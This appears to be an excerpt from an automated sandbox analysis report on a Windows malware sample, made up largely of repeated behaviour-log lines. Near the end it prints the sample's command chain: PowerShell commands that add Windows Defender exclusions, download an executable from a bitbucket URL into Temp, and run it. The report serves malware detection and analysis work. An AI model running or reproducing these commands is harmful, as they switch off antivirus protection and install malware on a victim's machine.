Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3417	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6374	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5415	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4370	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6653	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2931	Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 7576	Thread sleep count: 298 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep count: 3417 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep count: 6374 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep count: 5415 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 4370 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep count: 6653 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep count: 2931 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\	Jump to behavior

Source: Gq48hjKhZf.exe, 00000000.00000002.1780956281.00000000004AA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: (L_NECVMWar&Prod_VMware_SAbf-11d0-94f2-00a0c91efb8ws@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7872.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: Gq48hjKhZf.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat, type: DROPPED

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"			Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
